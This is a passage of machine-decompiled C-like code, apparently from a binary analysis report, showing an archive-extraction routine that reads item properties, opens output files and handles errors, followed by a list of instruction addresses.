							if( *((intOrPtr*)(_t810 + 0x14)) == _t651) {
								L17:
								__eflags =  *(_t822 + 0x14) - _t651;
								if( *(_t822 + 0x14) != _t651) {
									L146:
									 *( *(_t822 + 0x10)) = _t651;
									L147:
									__eflags =  *((intOrPtr*)(_t810 + 0xba)) - _t651;
									if( *((intOrPtr*)(_t810 + 0xba)) != _t651) {
										_push(0x20);
										_t434 = E004079F2();
										__eflags = _t434 - _t651;
										if(_t434 == _t651) {
											_t434 = 0;
											__eflags = 0;
										} else {
											 *(_t434 + 4) = _t651;
											 *(_t434 + 8) = _t651;
											 *_t434 = 0x47aa54;
										}
										 *(_t810 + 0x9c) = _t434;
										E0040C9B4(_t810 + 0xa0, _t434);
										_t800 =  *(_t810 + 0x9c);
										__eflags = _t800 - _t651;
										 *(_t822 + 0xc) = _t800;
										if(_t800 != _t651) {
											 *((intOrPtr*)( *_t800 + 4))(_t800);
										}
										 *((char*)(_t822 - 4)) = 0x2c;
										E0040C9B4( *(_t810 + 0x9c) + 8,  *( *(_t822 + 0x10)));
										_t440 =  *( *(_t822 + 0x10));
										__eflags = _t440 - _t651;
										if(_t440 != _t651) {
											 *((intOrPtr*)( *_t440 + 8))(_t440);
										}
										 *( *(_t822 + 0x10)) = _t800;
										_t812 =  *(_t810 + 0x9c);
										_t407 = _t812 + 0x18;
										 *_t407 =  *(_t812 + 0x18) | 0xffffffff;
										__eflags =  *_t407;
										 *(_t812 + 0x10) = _t651;
										 *(_t812 + 0x14) = _t651;
										 *((char*)(_t812 + 0x1c)) = 1;
									}
									L156:
									E00407A18( *(_t822 - 0x48));
									_t425 = 0;
									L157:
									 *[fs:0x0] =  *((intOrPtr*)(_t822 - 0xc));
									return _t425;
								}
								__eflags =  *((intOrPtr*)(_t810 + 0xb9)) - _t651;
								if( *((intOrPtr*)(_t810 + 0xb9)) != _t651) {
									goto L146;
								}
								__eflags =  *((intOrPtr*)(_t810 + 0xb8)) - _t651;
								if( *((intOrPtr*)(_t810 + 0xb8)) == _t651) {
									 *(_t822 - 0x70) = _t651;
									 *(_t822 - 0x6e) = _t651;
									 *((char*)(_t822 - 4)) = 3;
									_t801 =  *((intOrPtr*)( *_t798 + 0x18))(_t798,  *(_t822 + 0xc), 9, _t822 - 0x70);
									__eflags = _t801 - _t651;
									if(_t801 == _t651) {
										__eflags =  *(_t822 - 0x70) - 0x13;
										if( *(_t822 - 0x70) != 0x13) {
											__eflags =  *(_t822 - 0x70) - _t651;
											if( *(_t822 - 0x70) != _t651) {
												 *((char*)(_t822 - 4)) = 1;
												E0040C20F(_t822 - 0x70);
												_t801 = 0x80004005;
												L145:
												E00407A18( *(_t822 - 0x48));
												_t425 = _t801;
												goto L157;
											}
											 *(_t810 + 0x7f) = _t651;
											L32:
											 *((char*)(_t822 - 4)) = 1;
											E0040C20F(_t822 - 0x70);
											_t802 =  *(_t822 + 0xc);
											_push(_t810 + 0x7c);
											_push(_t810 + 0x60);
											_push(0xa);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											_push(_t810 + 0x7d);
											_push(_t810 + 0x68);
											_push(0xb);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											_push(_t810 + 0x7e);
											_push(_t810 + 0x70);
											_push(0xc);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											 *(_t822 + 0xb) = _t651;
											_push(_t822 + 0xb);
											_push(0x15);
											_t422 = E00417975( *((intOrPtr*)( *((intOrPtr*)(_t810 + 0x10)))), _t802);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											E00405B9F(_t822 - 0x24);
											_t803 = 0x47a420;
											 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
											 *((char*)(_t822 - 4)) = 4;
											E00408833(_t822 - 0x48, _t822 - 0x24, __eflags);
											_t681 =  *((intOrPtr*)(_t822 - 0x1c));
											__eflags = _t681 - _t651;
											if(_t681 != _t651) {
												 *(_t822 + 0xc) = _t651;
												_t461 =  *((intOrPtr*)(_t810 + 0x30)) - 1;
												__eflags = _t461;
												if(_t461 == 0) {
													_t462 =  *(_t810 + 0xac);
													__eflags = _t681 - _t462;
													 *(_t822 + 0xc) = _t462;
													if(_t681 > _t462) {
														_t804 = 0;
														__eflags = 0;
														while(1) {
															__eflags = _t804 -  *(_t822 + 0xc);
															if(_t804 >=  *(_t822 + 0xc)) {
																break;
															}
															_t633 = E0040807A( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t822 - 0x18)) + _t804 * 4)))));
															__eflags = _t633 - _t651;
															if(_t633 == _t651) {
																_t804 = _t804 + 1;
																continue;
															}
															 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
															 *((char*)(_t822 - 4)) = 7;
															L89:
															E0040862D();
															 *((char*)(_t822 - 4)) = 1;
															E00408604(_t822 - 0x24);
															_t651 = 0x80004005;
															L141:
															E00407A18( *(_t822 - 0x48));
															_t425 = _t651;
															goto L157;
														}
														_t803 = 0x47a420;
														L49:
														E004036D9(_t651, _t822 - 0x24, _t810, _t651,  *(_t822 + 0xc));
														E00416D6F(_t822 - 0x24);
														E004170F2(_t822 - 0x3c, _t822 - 0x24, __eflags);
														__eflags =  *(_t822 + 0xb) - _t651;
														 *((char*)(_t822 - 4)) = 8;
														if( *(_t822 + 0xb) != _t651) {
															L71:
															_t772 = _t810 + 0x24;
															_push(_t822 - 0x3c);
															E0040B0A0(_t822 - 0x30, _t810 + 0x24);
															__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
															 *((char*)(_t822 - 4)) = 0xa;
															if( *((intOrPtr*)(_t810 + 0x80)) == _t651) {
																__eflags =  *(_t810 + 0x58) - _t651;
																if( *(_t810 + 0x58) != _t651) {
																	L117:
																	__eflags =  *(_t822 + 0xb) - _t651;
																	if( *(_t822 + 0xb) != _t651) {
																		L143:
																		E00401E26(_t810 + 0x38, _t822 - 0x30);
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																		 *((char*)(_t822 - 4)) = 0x2b;
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		goto L147;
																	}
																	_push(0x20);
																	_t474 = E004079F2();
																	__eflags = _t474 - _t651;
																	if(_t474 == _t651) {
																		_t805 = 0;
																		__eflags = 0;
																	} else {
																		 *(_t474 + 4) = _t651;
																		 *(_t474 + 8) =  *(_t474 + 8) | 0xffffffff;
																		 *_t474 = 0x47aa64;
																		_t805 = _t474;
																	}
																	__eflags = _t805 - _t651;
																	 *(_t810 + 0x94) = _t805;
																	 *(_t822 + 0x14) = _t805;
																	if(_t805 != _t651) {
																		 *((intOrPtr*)( *_t805 + 4))(_t805);
																	}
																	_t475 =  *(_t810 + 0x94);
																	 *((char*)(_t822 - 4)) = 0x26;
																	asm("sbb edx, edx");
																	 *(_t475 + 0x18) = _t651;
																	 *(_t475 + 0x1c) = _t651;
																	_t476 = E0040BD54( *((intOrPtr*)(_t822 - 0x30)), ( ~( *(_t810 + 0x58)) & 0x00000002) + 2);
																	__eflags = _t476 - _t651;
																	if(_t476 != _t651) {
																		__eflags =  *(_t810 + 0x58) - _t651;
																		if( *(_t810 + 0x58) == _t651) {
																			L142:
																			E0040C9B4(_t810 + 0x98, _t805);
																			 *((char*)(_t822 - 4)) = 0xa;
																			 *( *(_t822 + 0x10)) = _t805;
																			_t803 = 0x47a420;
																			goto L143;
																		}
																		_t479 =  *(_t810 + 0x94);
																		_t480 =  *((intOrPtr*)( *_t479 + 0x10))(_t479,  *((intOrPtr*)(_t810 + 0x50)),  *((intOrPtr*)(_t810 + 0x54)), _t651, _t651);
																		__eflags = _t480 - _t651;
																		 *(_t822 + 0xc) = _t480;
																		if(_t480 == _t651) {
																			goto L142;
																		}
																		__eflags = _t805 - _t651;
																		 *((char*)(_t822 - 4)) = 0xa;
																		if(_t805 != _t651) {
																			 *((intOrPtr*)( *_t805 + 8))(_t805);
																		}
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x2a;
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		_t651 =  *(_t822 + 0xc);
																	} else {
																		E00412FDC(_t822 - 0x60, L"can not open output file ");
																		_t813 =  *((intOrPtr*)(_t810 + 0x18));
																		 *((char*)(_t822 - 4)) = 0x27;
																		_t490 =  *((intOrPtr*)( *_t813 + 0x1c))(_t813,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																		_push( *((intOrPtr*)(_t822 - 0x60)));
																		_t814 = _t490;
																		__eflags = _t814 - _t651;
																		if(_t814 == _t651) {
																			E00407A18();
																			__eflags = _t805 - _t651;
																			 *((char*)(_t822 - 4)) = 0xa;
																			if(_t805 != _t651) {
																				 *((intOrPtr*)( *_t805 + 8))(_t805);
																			}
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x29;
																			L94:
																			E0040862D();
																			 *((char*)(_t822 - 4)) = 1;
																			E00408604(_t822 - 0x24);
																			goto L141;
																		}
																		E00407A18();
																		__eflags = _t805 - _t651;
																		 *((char*)(_t822 - 4)) = 0xa;
																		if(_t805 != _t651) {
																			 *((intOrPtr*)( *_t805 + 8))(_t805);
																		}
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x28;
																		L123:
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		_t651 = _t814;
																	}
																	goto L141;
																}
																E0040351A(_t822 - 0x80);
																_push( *((intOrPtr*)(_t822 - 0x30)));
																 *((char*)(_t822 - 4)) = 0xc;
																_t508 = E0040B431(_t822 - 0xa8, _t772, __eflags); // executed
																__eflags = _t508 - _t651;
																if(_t508 == _t651) {
																	L116:
																	 *((char*)(_t822 - 4)) = 0xa;
																	E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																	goto L117;
																}
																_t511 =  *((intOrPtr*)(_t810 + 0x34)) - _t651;
																__eflags = _t511;
																if(_t511 == 0) {
																	asm("sbb edx, edx");
																	_t512 =  *((intOrPtr*)(_t810 + 0x18));
																	asm("sbb edx, edx");
																	_t808 =  *((intOrPtr*)( *_t512 + 0x14))(_t512,  *((intOrPtr*)(_t822 - 0x30)), _t822 - 0x90, _t822 - 0xa8,  *(_t822 - 0x48),  ~( *(_t810 + 0x7e)) & _t810 + 0x00000070,  ~( *(_t810 + 0x90)) & _t810 + 0x00000088, _t822 + 0xc);
																	__eflags = _t808 - _t651;
																	if(_t808 == _t651) {
																		_t515 =  *(_t822 + 0xc) - _t651;
																		__eflags = _t515;
																		if(_t515 == 0) {
																			L96:
																			_t803 = 0x47a420;
																			L97:
																			_t516 =  *((intOrPtr*)(_t810 + 0x34));
																			__eflags = _t516 - 3;
																			if(__eflags != 0) {
																				__eflags = _t516 - 4;
																				if(_t516 != 4) {
																					_t517 = E00409F99( *((intOrPtr*)(_t822 - 0x30)));
																					__eflags = _t517 - _t651;
																					if(_t517 != _t651) {
																						goto L116;
																					}
																					_t518 = E00403532(_t822 - 0x6c,  *0x48bd9c);
																					 *((char*)(_t822 - 4)) = 0x21;
																					E0040B0A0(_t822 - 0x60, _t518);
																					 *((char*)(_t822 - 4)) = 0x23;
																					E00407A18( *((intOrPtr*)(_t822 - 0x6c)));
																					_t815 =  *((intOrPtr*)(_t810 + 0x18));
																					_t522 =  *((intOrPtr*)( *_t815 + 0x1c))(_t815,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																					_push( *((intOrPtr*)(_t822 - 0x60)));
																					_t814 = _t522;
																					__eflags = _t814 - _t651;
																					if(_t814 == _t651) {
																						E00407A18();
																						E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																						 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																						 *((char*)(_t822 - 4)) = 0x25;
																						goto L94;
																					}
																					E00407A18();
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x24;
																					goto L123;
																				}
																				E004039C0(_t822 - 0x54, _t822 - 0x30);
																				 *((char*)(_t822 - 4)) = 0x18;
																				_t533 = E0040CD50(_t822 - 0x54, __eflags);
																				__eflags = _t533 - _t651;
																				if(_t533 != _t651) {
																					_t534 = E00409BC3( *((intOrPtr*)(_t822 - 0x30)),  *(_t822 - 0x54));
																					__eflags = _t534 - _t651;
																					if(_t534 != _t651) {
																						E00407A18( *(_t822 - 0x54));
																						goto L116;
																					}
																					_t536 = E00403532(_t822 - 0x6c,  *0x48bd98);
																					 *((char*)(_t822 - 4)) = 0x1c;
																					E0040B0A0(_t822 - 0x60, _t536);
																					 *((char*)(_t822 - 4)) = 0x1e;
																					E00407A18( *((intOrPtr*)(_t822 - 0x6c)));
																					_t816 =  *((intOrPtr*)(_t810 + 0x18));
																					_t540 =  *((intOrPtr*)( *_t816 + 0x1c))(_t816,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																					_push( *((intOrPtr*)(_t822 - 0x60)));
																					_t817 = _t540;
																					__eflags = _t817 - _t651;
																					if(_t817 == _t651) {
																						E00407A18();
																						E00407A18( *(_t822 - 0x54));
																						E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																						 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																						 *((char*)(_t822 - 4)) = 0x20;
																						L112:
																						E0040862D();
																						 *((char*)(_t822 - 4)) = 1;
																						E00408604(_t822 - 0x24);
																						L113:
																						_t817 = 0x80004005;
																						L114:
																						E00407A18( *(_t822 - 0x48));
																						_t425 = _t817;
																						goto L157;
																					}
																					E00407A18();
																					E00407A18( *(_t822 - 0x54));
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x1f;
																					L110:
																					E0040862D();
																					 *((char*)(_t822 - 4)) = 1;
																					E00408604(_t822 - 0x24);
																					goto L114;
																				}
																				_t791 =  *0x48bd94; // 0x48be34
																				E00412FDC(_t822 - 0x60, _t791);
																				_t818 =  *((intOrPtr*)(_t810 + 0x18));
																				 *((char*)(_t822 - 4)) = 0x19;
																				_t559 =  *((intOrPtr*)( *_t818 + 0x1c))(_t818,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																				_push( *((intOrPtr*)(_t822 - 0x60)));
																				_t817 = _t559;
																				__eflags = _t817 - _t651;
																				if(_t817 == _t651) {
																					E00407A18();
																					E00407A18( *(_t822 - 0x54));
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x1b;
																					goto L112;
																				}
																				E00407A18();
																				E00407A18( *(_t822 - 0x54));
																				E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																				 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																				 *((char*)(_t822 - 4)) = 0x1a;
																				goto L110;
																			}
																			_t570 = E0040CD50(_t822 - 0x30, __eflags);
																			__eflags = _t570 - _t651;
																			if(_t570 != _t651) {
																				goto L116;
																			}
																			_t571 = E00403532(_t822 - 0x60,  *0x48bd94);
																			 *((char*)(_t822 - 4)) = 0x13;
																			E0040B0A0(_t822 - 0x54, _t571);
																			 *((char*)(_t822 - 4)) = 0x15;
																			E00407A18( *((intOrPtr*)(_t822 - 0x60)));
																			_t819 =  *((intOrPtr*)(_t810 + 0x18));
																			_t575 =  *((intOrPtr*)( *_t819 + 0x1c))(_t819,  *(_t822 - 0x54), _t822 - 0x30);
																			_push( *(_t822 - 0x54));
																			_t817 = _t575;
																			__eflags = _t817 - _t651;
																			if(_t817 == _t651) {
																				E00407A18();
																				E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																				 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																				 *((char*)(_t822 - 4)) = 0x17;
																				goto L112;
																			}
																			E00407A18();
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																			 *((char*)(_t822 - 4)) = 0x16;
																			goto L110;
																		}
																		_t584 = _t515 - 1;
																		__eflags = _t584;
																		if(_t584 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 1;
																			goto L96;
																		}
																		_t585 = _t584 - 1;
																		__eflags = _t585;
																		if(_t585 == 0) {
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x10;
																			goto L94;
																		}
																		_t589 = _t585 - 1;
																		__eflags = _t589;
																		if(_t589 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 2;
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x11;
																			goto L94;
																		}
																		_t593 = _t589 - 1;
																		__eflags = _t593;
																		if(_t593 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 3;
																			goto L96;
																		}
																		_push( *((intOrPtr*)(_t822 - 0x80)));
																		__eflags = _t593 == 1;
																		if(_t593 == 1) {
																			E00407A18();
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0xf;
																			E0040862D();
																			 *((char*)(_t822 - 4)) = 1;
																			E00408604(_t822 - 0x24);
																			_t651 = 0x80004004;
																			goto L141;
																		}
																		E00407A18();
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x12;
																		goto L89;
																	}
																	E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																	E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																	E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																	 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																	 *((char*)(_t822 - 4)) = 0xe;
																	E0040862D();
																	 *((char*)(_t822 - 4)) = 1;
																	E00408604(_t822 - 0x24);
																	_t651 = _t808;
																	goto L141;
																}
																__eflags = _t511 != 0;
																if(_t511 != 0) {
																	goto L97;
																}
																E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																 *((char*)(_t822 - 4)) = 0xd;
																E0040862D();
																 *((char*)(_t822 - 4)) = 1;
																E00408604(_t822 - 0x24);
																goto L156;
															}
															_t820 = _t810 + 0x38;
															E00401E26(_t810 + 0x38, _t822 - 0x30);
															__eflags =  *(_t822 + 0xb) - _t651;
															if( *(_t822 + 0xb) != _t651) {
																E00409B24( *_t820);
															}
															E00407A18( *((intOrPtr*)(_t822 - 0x30)));
															E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
															 *((intOrPtr*)(_t822 - 0x24)) = _t803;
															 *((char*)(_t822 - 4)) = 0xb;
															goto L94;
														}
														__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
														if( *((intOrPtr*)(_t810 + 0x80)) != _t651) {
															L53:
															__eflags =  *((intOrPtr*)(_t822 - 0x1c)) - _t651;
															if( *((intOrPtr*)(_t822 - 0x1c)) == _t651) {
																goto L71;
															}
															 *(_t822 - 0x54) = _t651;
															 *(_t822 - 0x50) = _t651;
															 *(_t822 - 0x4c) = _t651;
															E00401E9A(_t822 - 0x54, 3);
															_push(_t822 - 0x54);
															 *((char*)(_t822 - 4)) = 9;
															E00411ED0(_t810, _t822, _t822 - 0x24);
															__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
															if( *((intOrPtr*)(_t810 + 0x80)) == _t651) {
																L70:
																 *((char*)(_t822 - 4)) = 8;
																E00407A18( *(_t822 - 0x54));
																goto L71;
															}
															__eflags =  *((intOrPtr*)(_t810 + 0x5c)) - _t651;
															if( *((intOrPtr*)(_t810 + 0x5c)) == _t651) {
																L58:
																_t627 =  *((intOrPtr*)(_t810 + 0x10));
																__eflags =  *((intOrPtr*)(_t627 + 0x2c)) - _t651;
																if( *((intOrPtr*)(_t627 + 0x2c)) == _t651) {
																	_t628 = 0;
																	__eflags = 0;
																} else {
																	_t628 = _t627 + 0x24;
																}
																L61:
																__eflags =  *((intOrPtr*)(_t810 + 0x5b)) - _t651;
																if( *((intOrPtr*)(_t810 + 0x5b)) == _t651) {
																	L64:
																	_t754 = 0;
																	__eflags = 0;
																	L65:
																	__eflags =  *((intOrPtr*)(_t810 + 0x5a)) - _t651;
																	if( *((intOrPtr*)(_t810 + 0x5a)) == _t651) {
																		L68:
																		_t793 = 0;
																		__eflags = 0;
																		L69:
																		E004098CF( *(_t822 - 0x54), _t793, _t754, _t628); // executed
																		goto L70;
																	}
																	__eflags =  *((intOrPtr*)(_t810 + 0x7c)) - _t651;
																	if( *((intOrPtr*)(_t810 + 0x7c)) == _t651) {
																		goto L68;
																	}
																	_t793 = _t810 + 0x60;
																	goto L69;
																}
																__eflags =  *((intOrPtr*)(_t810 + 0x7d)) - _t651;
																if( *((intOrPtr*)(_t810 + 0x7d)) == _t651) {
																	goto L64;
																}
																_t754 = _t810 + 0x68;
																goto L65;
															}
															__eflags =  *(_t810 + 0x7e) - _t651;
															if( *(_t810 + 0x7e) == _t651) {
																goto L58;
															}
															_t628 = _t810 + 0x70;
															goto L61;
														}
														__eflags =  *((intOrPtr*)(_t822 - 0x1c)) - _t651;
														if( *((intOrPtr*)(_t822 - 0x1c)) == _t651) {
															goto L71;
														}
														E00408635(_t822 - 0x24);
														goto L53;
													}
													 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
													 *((char*)(_t822 - 4)) = 6;
													goto L89;
												}
												__eflags = _t461 == 1;
												if(_t461 == 1) {
													 *(_t822 + 0xc) = _t681 - 1;
												}
												goto L49;
											}
											 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
											 *((char*)(_t822 - 4)) = 5;
											goto L89;
										}
										 *(_t810 + 0x7f) = 1;
										 *((intOrPtr*)(_t810 + 0x78)) =  *((intOrPtr*)(_t822 - 0x68));
										goto L32;
									}
									 *((char*)(_t822 - 4)) = 1;
									E0040C20F(_t822 - 0x70);
									goto L145;
								}
								_push(8);
								_t637 = E004079F2();
								__eflags = _t637 - _t651;
								if(_t637 == _t651) {
									_t821 = 0;
									__eflags = 0;
								} else {
									 *(_t637 + 4) = _t651;
									 *_t637 = 0x47aa80;
									_t821 = _t637;
								}
								__eflags = _t821 - _t651;
								if(_t821 != _t651) {
									 *((intOrPtr*)( *_t821 + 4))(_t821);
								}
								 *( *(_t822 + 0x10)) = _t821;
								goto L141;
							}
							__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
							_t643 = E00408E6D( *((intOrPtr*)(_t810 + 0x80)) - _t651, _t822 - 0x48, _t422 & 0xffffff00 |  *((intOrPtr*)(_t810 + 0x80)) == _t651);
							__eflags = _t643 - _t651;
							if(_t643 == _t651) {
								goto L141;
							}
							goto L17;
						}
						__eflags =  *(_t822 - 0x70) - 0x15;
						if( *(_t822 - 0x70) == 0x15) {
							 *(_t810 + 0x58) = 1;
							 *((intOrPtr*)(_t810 + 0x50)) =  *((intOrPtr*)(_t822 - 0x68));
							 *((intOrPtr*)(_t810 + 0x54)) =  *((intOrPtr*)(_t822 - 0x64));
							goto L13;
						}
						 *((char*)(_t822 - 4)) = 1;
						E0040C20F(_t822 - 0x70);
						goto L113;
					}
					 *((char*)(_t822 - 4)) = 1;
					E0040C20F(_t822 - 0x70);
					_t817 =  *(_t822 + 8);
					goto L114;
				}
				L5:
				_t651 = _t422;
				goto L141;
			}

0x0041202c
0x00412039
0x0041203d
0x0041203f
0x00412042
0x00412048
0x00412050
0x00412053
0x00412058
0x0041205b
0x0041205b
0x00412060
0x00412066
0x00412068
0x0041206c
0x00412071
0x00412074
0x00412074
0x00412079
0x00412084
0x00412087
0x0041208a
0x00412090
0x00412096
0x0041209c
0x0041209f
0x004120a2
0x004120a5
0x004120b0
0x004120b1
0x004120b5
0x004120b8
0x004120ba
0x004120c1
0x004120d6
0x004120db
0x004120dd
0x00000000
0x00000000
0x004120e6
0x004120eb
0x004120ef
0x004120fe
0x00412103
0x00412106
0x00412108
0x0041210b
0x00412121
0x00412125
0x0041214f
0x00412152
0x00412156
0x00412161
0x00412162
0x00412166
0x0041216b
0x0041216d
0x00000000
0x00000000
0x00412175
0x0041217a
0x0041217c
0x00000000
0x00000000
0x00412185
0x00412187
0x004121a4
0x004121a4
0x004121a7
0x00412bd2
0x00412bd5
0x00412bd7
0x00412bd7
0x00412bdd
0x00412be3
0x00412be5
0x00412bea
0x00412bed
0x00412bfd
0x00412bfd
0x00412bef
0x00412bef
0x00412bf2
0x00412bf5
0x00412bf5
0x00412c06
0x00412c0c
0x00412c11
0x00412c17
0x00412c19
0x00412c1c
0x00412c21
0x00412c21
0x00412c27
0x00412c37
0x00412c3f
0x00412c41
0x00412c43
0x00412c48
0x00412c48
0x00412c4e
0x00412c50
0x00412c56
0x00412c56
0x00412c56
0x00412c5a
0x00412c5d
0x00412c60
0x00412c60
0x00412c64
0x00412c67
0x00412c6d
0x00412c7c
0x00412c81
0x00412c8a
0x00412c8a
0x004121ad
0x004121b3
0x00000000
0x00000000
0x004121b9
0x004121bf
0x004121f0
0x004121f4
0x00412203
0x0041220b
0x0041220d
0x0041220f
0x00412222
0x00412227
0x00412235
0x00412239
0x00412bb4
0x00412bb8
0x00412bbd
0x00412bc2
0x00412bc5
0x00412bcb
0x00000000
0x00412bcb
0x0041223f
0x00412242
0x00412245
0x00412249
0x0041224e
0x00412254
0x00412258
0x00412259
0x0041225b
0x0041225e
0x00412263
0x00412265
0x00000000
0x00000000
0x00412270
0x00412274
0x00412275
0x00412277
0x00412278
0x0041227d
0x0041227f
0x00000000
0x00000000
0x0041228a
0x0041228e
0x0041228f
0x00412291
0x00412292
0x00412297
0x00412299
0x00000000
0x00000000
0x004122a2
0x004122ac
0x004122ad
0x004122b1
0x004122b6
0x004122b8
0x00000000
0x00000000
0x004122c1
0x004122c6
0x004122cb
0x004122d4
0x004122d8
0x004122dd
0x004122e0
0x004122e2
0x004122f3
0x004122f6
0x004122f6
0x004122f7
0x00412302
0x00412308
0x0041230a
0x0041230d
0x0041231b
0x0041231b
0x0041231d
0x0041231d
0x00412320
0x00000000
0x00000000
0x00412335
0x0041233a
0x0041233c
0x0041234e
0x00000000
0x0041234e
0x0041233e
0x00412345
0x004125c9
0x004125cc
0x004125d4
0x004125d8
0x004125dd
0x00412b4c
0x00412b4f
0x00412b55
0x00000000
0x00412b55
0x00412351
0x00412356
0x0041235d
0x00412365
0x00412370
0x00412375
0x00412378
0x0041237c
0x00412429
0x0041242c
0x0041242f
0x00412433
0x00412438
0x0041243e
0x00412442
0x0041247c
0x0041247f
0x00412925
0x00412925
0x00412928
0x00412b76
0x00412b7d
0x00412b85
0x00412b8d
0x00412b93
0x00412b9a
0x00412b9e
0x00412ba6
0x00412baa
0x00000000
0x00412baa
0x0041292e
0x00412930
0x00412935
0x00412938
0x00412a0e
0x00412a0e
0x0041293e
0x0041293e
0x00412941
0x00412945
0x0041294b
0x0041294b
0x00412a10
0x00412a12
0x00412a18
0x00412a1b
0x00412a20
0x00412a20
0x00412a2b
0x00412a31
0x00412a35
0x00412a3a
